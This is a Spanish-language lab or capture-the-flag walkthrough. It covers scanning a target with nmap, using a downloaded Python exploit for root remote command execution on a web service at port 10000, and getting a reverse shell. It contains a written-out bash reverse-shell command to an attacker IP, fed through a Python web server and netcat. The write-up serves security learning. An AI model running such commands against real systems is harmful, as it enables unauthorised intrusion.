Vamos a hacer un reconocimiento con nmap y nos encuentra el puerto 22 y el puerto 10000: {{pasted_image_20230403105650.png|}} Vemos que tenemos un servicio web corriendo por el puerto 10.000, que utiliza SSL por lo que tenemos que poner la URL como https: {{pasted_image_20230403105911.png|}} Si buscamos por internet, podemos ver que existe un exploit en python que nos permite ejecutar comandos si lo lanzamos contra esta web: {{pasted_image_20230404123527.png|}} {{pasted_image_20230404123542.png|}} Por tanto vamos a probar en descargarlo y vemos las instrucciones: {{pasted_image_20230404123612.png|}} Lo probamos utilizando los parámetros oportunos y vemos que tenemos ejecución remota de comandos, y además siendo el usuario root: {{pasted_image_20230404123650.png|}} Es importante recalcar que para esta herramienta los comandos deben ir entre comillas, para que se interpreten correctamente los espacios: {{pasted_image_20230404124626.png|}} Por tanto vamos a compartir el código para obtener la reverse shell con python y lo pipeamos con bash desde la máquina víctima mientras estamos escuchando con netcat: bash -i >& /dev/tcp/10.10.16.27/443 0>&1 Subimos esto a un servidor web con python: {{pasted_image_20230404124951.png|}} Lo ejecutamos en la máquina víctima pipeándolo con bash: {{pasted_image_20230404125013.png|}} Y recibiremos la shell reversa con netcat: {{pasted_image_20230404125034.png|}}